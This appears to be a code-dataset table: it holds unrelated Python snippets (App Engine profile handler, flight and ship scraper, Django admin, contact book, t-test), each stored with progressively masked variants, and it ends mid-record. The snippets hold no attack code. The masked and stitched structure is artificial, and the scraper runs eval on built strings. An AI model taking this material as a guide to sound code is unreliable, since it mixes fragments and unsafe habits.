code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
from google.appengine.api import users
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
import os
import logging
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class UserProfile(ndb.Model):
"""Models the profile (JSON) of an individual user."""
profile = ndb.TextProperty()
date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def query_profile(cls, ancestor_key):
return cls.query(ancestor=ancestor_key).get()
class UserProfileHandler(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('templates/profile.html')
the_user = self.request.get('user')
logging.info("The user = " + the_user)
if the_user == "":
the_user = users.get_current_user().email()
owner = True
else:
owner = False
user_profile_data = UserProfile.get_by_id(the_user)
template_values = { 'owner': owner, 'user': the_user}
if user_profile_data:
template_values['profile_data'] = user_profile_data.profile
logging.info(user_profile_data)
self.response.out.write(template.render(template_values))
def post(self):
user = users.get_current_user()
profile_data = self.request.get('profile_data')
user_profile = UserProfile(id=user.email(), profile=profile_data)
user_profile.put()
self.redirect('/profile')
#self.response.out.write("Here is the JSON for your profile.")
#self.response.out.write(profile_data)
app = webapp2.WSGIApplication([
('/profile', UserProfileHandler),
], debug=True)
|
normal
|
{
"blob_id": "309090167c2218c89494ce17f7a25bd89320a202",
"index": 3855,
"step-1": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-3": "<mask token>\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-4": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\nimport webapp2\nimport jinja2\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-5": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\n\nimport webapp2\nimport jinja2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\nclass UserProfileHandler(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info(\"The user = \" + the_user)\n if the_user == \"\":\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = { 'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n #self.response.out.write(\"Here is the JSON for your profile.\")\n #self.response.out.write(profile_data)\n\napp = webapp2.WSGIApplication([\n ('/profile', UserProfileHandler),\n], debug=True)\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
#!/usr/bin/python
import os
# http://stackoverflow.com/questions/4500564/directory-listing-based-on-time
def sorted_ls(path):
mtime = lambda f: os.stat(os.path.join(path, f)).st_mtime
return list(sorted(os.listdir(path), key=mtime))
def main():
print "Content-type: text/html\n\n"
print "<html><head><title>title</title></head>"
print "<body>"
path='../html/biasframes/'
# print '<img width=100% src=\"../biasframes/'+file+'\" alt=\"'+file+'\" /><br>'
files = sorted_ls(path)
files.reverse()
# print files
nfiles=0
for file in files:
print '<img width=100% src=\"../biasframes/'+file+'\" alt=\"'+file+'\" /><br>'
nfiles+=1
if nfiles>24:
break
print "</body>"
print "</html>"
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "f4715a1f59ceba85d95223ef59003410e35bfb7f",
"index": 4037,
"step-1": "#!/usr/bin/python\nimport os\n\n# http://stackoverflow.com/questions/4500564/directory-listing-based-on-time\ndef sorted_ls(path):\n mtime = lambda f: os.stat(os.path.join(path, f)).st_mtime\n return list(sorted(os.listdir(path), key=mtime))\n\ndef main():\n print \"Content-type: text/html\\n\\n\"\n print \"<html><head><title>title</title></head>\"\n print \"<body>\"\n\n path='../html/biasframes/'\n # print '<img width=100% src=\\\"../biasframes/'+file+'\\\" alt=\\\"'+file+'\\\" /><br>'\n\n files = sorted_ls(path)\n files.reverse()\n # print files\n\n nfiles=0\n for file in files:\n print '<img width=100% src=\\\"../biasframes/'+file+'\\\" alt=\\\"'+file+'\\\" /><br>'\n nfiles+=1\n if nfiles>24:\n break\n\n print \"</body>\"\n print \"</html>\"\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from selenium import webdriver
from urllib.request import urlopen, Request
from subprocess import check_output
import json
#from flask import Flask
# https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds=-32.27,-34.08,-73.15,-70.29
def get_json_aviones(north, south, west, east):
#driver = webdriver.Chrome('/Users/luisl/Desktop/Pega Altavoz/chromedriver')
driver = webdriver.PhantomJS("phantomjs")
# Mala práctica de programación
eval("driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))")
json_aviones = json.loads(driver.find_element_by_tag_name("pre").text)
driver.close()
return json_aviones
#######################
def get_json_buques(centerx, centery, zoom):
## PRUEBA 1 - Mezclar con phantomjs
count = 0
while True:
ignore = False
count += 1
print(centerx, centery, zoom)
out = check_output(["phantomjs", "GetBarcos.js", str(centerx), str(centery), str(zoom)])
links = json.loads(out)
if links[0] != 0:
break
else:
print("get_json_buques FAILED -------------- trying again")
if count == 5:
ignore = True
break
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'vessel-image': '00853fc25189416456442da74396a0288d02',
'x-requested-with': 'XMLHttpRequest'}
webpage = []
for link in links:
if not ignore:
req = Request(link, headers=headers)
webpage.extend(json.loads(urlopen(req).read().decode())['data']['rows'])
## try:
## with open("data", "w") as file:
## file.write(json.dumps(webpage[0]))
## except Exception as e:
## print(e)
return webpage
#######################
#app = Flask(__name__)
#
#
#@app.route('/')
# def hello_world():
# return json.dumps({'aviones': get_json_aviones(),
# 'buques': get_json_buques()})
#
#
#t = Timer(10.0, hello_world)
# t.start()
if __name__ == "__main__":
get_json_buques(-71, -33, 9)
# get_json_aviones(32.27, -34.08, -73.15, -70.29)
|
normal
|
{
"blob_id": "9ba5af7d2b6d4f61bb64a055efb15efa8e08d35c",
"index": 5379,
"step-1": "<mask token>\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_json_aviones(north, south, west, east):\n driver = webdriver.PhantomJS('phantomjs')\n eval(\n \"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\"\n )\n json_aviones = json.loads(driver.find_element_by_tag_name('pre').text)\n driver.close()\n return json_aviones\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_json_aviones(north, south, west, east):\n driver = webdriver.PhantomJS('phantomjs')\n eval(\n \"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\"\n )\n json_aviones = json.loads(driver.find_element_by_tag_name('pre').text)\n driver.close()\n return json_aviones\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\nif __name__ == '__main__':\n get_json_buques(-71, -33, 9)\n",
"step-4": "from selenium import webdriver\nfrom urllib.request import urlopen, Request\nfrom subprocess import check_output\nimport json\n\n\ndef get_json_aviones(north, south, west, east):\n driver = webdriver.PhantomJS('phantomjs')\n eval(\n \"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\"\n )\n json_aviones = json.loads(driver.find_element_by_tag_name('pre').text)\n driver.close()\n return json_aviones\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\nif __name__ == '__main__':\n get_json_buques(-71, -33, 9)\n",
"step-5": "from selenium import webdriver\nfrom urllib.request import urlopen, Request\nfrom subprocess import check_output\nimport json\n#from flask import Flask\n\n\n# https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds=-32.27,-34.08,-73.15,-70.29\ndef get_json_aviones(north, south, west, east):\n\n #driver = webdriver.Chrome('/Users/luisl/Desktop/Pega Altavoz/chromedriver')\n driver = webdriver.PhantomJS(\"phantomjs\")\n\n # Mala práctica de programación\n eval(\"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\")\n json_aviones = json.loads(driver.find_element_by_tag_name(\"pre\").text)\n\n driver.close()\n\n return json_aviones\n\n#######################\n\n\ndef get_json_buques(centerx, centery, zoom):\n\n ## PRUEBA 1 - Mezclar con phantomjs\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output([\"phantomjs\", \"GetBarcos.js\", str(centerx), str(centery), str(zoom)])\n\n links = json.loads(out)\n\n if links[0] != 0:\n break\n\n else:\n print(\"get_json_buques FAILED -------------- trying again\")\n \n if count == 5:\n ignore = True\n break\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n\n webpage = []\n\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']['rows'])\n\n ## try:\n ## with open(\"data\", \"w\") as file:\n ## file.write(json.dumps(webpage[0]))\n ## except Exception as e:\n ## print(e)\n\n return webpage\n\n#######################\n\n\n#app = Flask(__name__)\n#\n#\n#@app.route('/')\n# def hello_world():\n# return json.dumps({'aviones': get_json_aviones(),\n# 'buques': get_json_buques()})\n#\n#\n#t = Timer(10.0, hello_world)\n# t.start()\n\n\nif __name__ == \"__main__\":\n\n get_json_buques(-71, -33, 9)\n # get_json_aviones(32.27, -34.08, -73.15, -70.29)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.contrib import admin
from main.models import Assignment, Review, Sample, Question, SampleMultipleFile
# Register your models here.
admin.site.register(Assignment)
admin.site.register(Review)
admin.site.register(Question)
class MultipleFileInline(admin.TabularInline):
model = SampleMultipleFile
class SampleAdmin(admin.ModelAdmin):
inlines = [ MultipleFileInline ]
prepopulated_fields = {'slug': ('heading',)}
admin.site.register(Sample, SampleAdmin)
|
normal
|
{
"blob_id": "d18c45c08face08ce8f7dad915f1896c24c95cbf",
"index": 2991,
"step-1": "<mask token>\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MultipleFileInline(admin.TabularInline):\n model = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\n<mask token>\n",
"step-3": "<mask token>\nadmin.site.register(Assignment)\nadmin.site.register(Review)\nadmin.site.register(Question)\n\n\nclass MultipleFileInline(admin.TabularInline):\n model = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\nadmin.site.register(Sample, SampleAdmin)\n",
"step-4": "from django.contrib import admin\nfrom main.models import Assignment, Review, Sample, Question, SampleMultipleFile\nadmin.site.register(Assignment)\nadmin.site.register(Review)\nadmin.site.register(Question)\n\n\nclass MultipleFileInline(admin.TabularInline):\n model = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\nadmin.site.register(Sample, SampleAdmin)\n",
"step-5": "from django.contrib import admin\nfrom main.models import Assignment, Review, Sample, Question, SampleMultipleFile\n\n# Register your models here.\nadmin.site.register(Assignment)\nadmin.site.register(Review)\nadmin.site.register(Question)\n\n\nclass MultipleFileInline(admin.TabularInline):\n\tmodel = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n\tinlines = [ MultipleFileInline ]\n\tprepopulated_fields = {'slug': ('heading',)}\n\nadmin.site.register(Sample, SampleAdmin)",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
from ContactBook import ContactBook
import csv
def run():
contact_book = ContactBook()
with open("22_agenda/contactos.csv",'r') as f:
reader = csv.reader(f)
for idx,row in enumerate(reader):
if idx == 0:
continue
else:
contact_book.add(row[0],row[1],row[2])
while True:
comando = input('''
Que desea hacer
a. añadir contacto
b. actualizar contacto
c. buscar contacto
d. eliminar contacto
e. listar contacto
f. salir
: ''')
if comando == 'a':
print("añadir contacto")
nombre = input("Escribe el nombre de la persona: ")
telefono = input("Escribe el telefono de la persona: ")
email = input("ingrese el email de la persona: ")
contact_book.add(nombre,telefono,email)
elif comando == 'b':
print("actualizar contacto")
nombre = input("Escribe el nombre de la persona: ")
contact_book.update_menu(nombre)
elif comando == 'c':
print("buscar contacto")
nombre = input("Escribe el nombre de la persona: ")
contact_book.search(nombre)
elif comando == 'd':
print("eliminar contacto")
nombre = input("Escribe el nombre de la persona: ")
contact_book.delete(nombre)
elif comando == 'e':
print("listar contactos")
contact_book.show_all()
elif comando == 'f':
print("salir ")
break
else:
print("opcion no valida")
if __name__ == "__main__":
run()
|
normal
|
{
"blob_id": "f5831b84c1177d8b869db05d332bd364b3f72fff",
"index": 4282,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef run():\n contact_book = ContactBook()\n with open('22_agenda/contactos.csv', 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0], row[1], row[2])\n while True:\n comando = input(\n \"\"\"\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : \"\"\"\n )\n if comando == 'a':\n print('añadir contacto')\n nombre = input('Escribe el nombre de la persona: ')\n telefono = input('Escribe el telefono de la persona: ')\n email = input('ingrese el email de la persona: ')\n contact_book.add(nombre, telefono, email)\n elif comando == 'b':\n print('actualizar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.update_menu(nombre)\n elif comando == 'c':\n print('buscar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.search(nombre)\n elif comando == 'd':\n print('eliminar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.delete(nombre)\n elif comando == 'e':\n print('listar contactos')\n contact_book.show_all()\n elif comando == 'f':\n print('salir ')\n break\n else:\n print('opcion no valida')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef run():\n contact_book = ContactBook()\n with open('22_agenda/contactos.csv', 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0], row[1], row[2])\n while True:\n comando = input(\n \"\"\"\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : \"\"\"\n )\n if comando == 'a':\n print('añadir contacto')\n nombre = input('Escribe el nombre de la persona: ')\n telefono = input('Escribe el telefono de la persona: ')\n email = input('ingrese el email de la persona: ')\n contact_book.add(nombre, telefono, email)\n elif comando == 'b':\n print('actualizar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.update_menu(nombre)\n elif comando == 'c':\n print('buscar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.search(nombre)\n elif comando == 'd':\n print('eliminar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.delete(nombre)\n elif comando == 'e':\n print('listar contactos')\n contact_book.show_all()\n elif comando == 'f':\n print('salir ')\n break\n else:\n print('opcion no valida')\n\n\nif __name__ == '__main__':\n run()\n",
"step-4": "from ContactBook import ContactBook\nimport csv\n\n\ndef run():\n contact_book = ContactBook()\n with open('22_agenda/contactos.csv', 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0], row[1], row[2])\n while True:\n comando = input(\n \"\"\"\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : \"\"\"\n )\n if comando == 'a':\n print('añadir contacto')\n nombre = input('Escribe el nombre de la persona: ')\n telefono = input('Escribe el telefono de la persona: ')\n email = input('ingrese el email de la persona: ')\n contact_book.add(nombre, telefono, email)\n elif comando == 'b':\n print('actualizar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.update_menu(nombre)\n elif comando == 'c':\n print('buscar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.search(nombre)\n elif comando == 'd':\n print('eliminar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.delete(nombre)\n elif comando == 'e':\n print('listar contactos')\n contact_book.show_all()\n elif comando == 'f':\n print('salir ')\n break\n else:\n print('opcion no valida')\n\n\nif __name__ == '__main__':\n run()\n",
"step-5": "from ContactBook import ContactBook\nimport csv\n\ndef run(): \n\n contact_book = ContactBook()\n \n with open(\"22_agenda/contactos.csv\",'r') as f:\n reader = csv.reader(f)\n for idx,row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0],row[1],row[2])\n\n\n while True:\n comando = input('''\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : ''')\n\n if comando == 'a':\n print(\"añadir contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n telefono = input(\"Escribe el telefono de la persona: \")\n email = input(\"ingrese el email de la persona: \")\n\n contact_book.add(nombre,telefono,email)\n\n elif comando == 'b':\n print(\"actualizar contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n contact_book.update_menu(nombre)\n\n elif comando == 'c':\n print(\"buscar contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n contact_book.search(nombre)\n\n elif comando == 'd':\n print(\"eliminar contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n contact_book.delete(nombre)\n\n elif comando == 'e':\n print(\"listar contactos\")\n contact_book.show_all()\n\n elif comando == 'f':\n print(\"salir \")\n break\n\n else:\n print(\"opcion no valida\")\n\nif __name__ == \"__main__\":\n run()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
from scipy import stats
a = np.random.normal(25.0, 5.0, 10000)
b = np.random.normal(26.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness
b = np.random.normal(25.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # no change, outcome is likely random
|
normal
|
{
"blob_id": "ba85f3c8a9e40f30076c13487a97567f7bc646dc",
"index": 8041,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(stats.ttest_ind(a, b))\n<mask token>\nprint(stats.ttest_ind(a, b))\n",
"step-3": "<mask token>\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-4": "import numpy as np\nfrom scipy import stats\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-5": "import numpy as np\r\nfrom scipy import stats\r\n\r\na = np.random.normal(25.0, 5.0, 10000)\r\nb = np.random.normal(26.0, 5.0, 10000)\r\n\r\nprint(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness\r\n\r\nb = np.random.normal(25.0, 5.0, 10000)\r\nprint(stats.ttest_ind(a, b)) # no change, outcome is likely random\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def sum_numbers(numbers=None):
sum = 0
if numbers == None:
for number in range(1, 101):
sum += number
return sum
for number in numbers:
sum += number
return sum
|
normal
|
{
"blob_id": "a85d06d72b053b0ef6cb6ec2ba465bfb8975b28e",
"index": 3879,
"step-1": "<mask token>\n",
"step-2": "def sum_numbers(numbers=None):\n sum = 0\n if numbers == None:\n for number in range(1, 101):\n sum += number\n return sum\n for number in numbers:\n sum += number\n return sum\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# All about users.
#
# author: [email protected]
#
from client import ClientHelper
from mongodb import MongoDBClient
class FixedData:
def get_data( self, id ):
data = self.get_data_from_mongodb( id )
if ( data ):
return data
else:
data = self.get_data_from_douban( id )
self.upsert_data_into_mongo( data )
|
normal
|
{
"blob_id": "b1530c664fa236e61ff50bca502bf79730c3386c",
"index": 6647,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass FixedData:\n <mask token>\n",
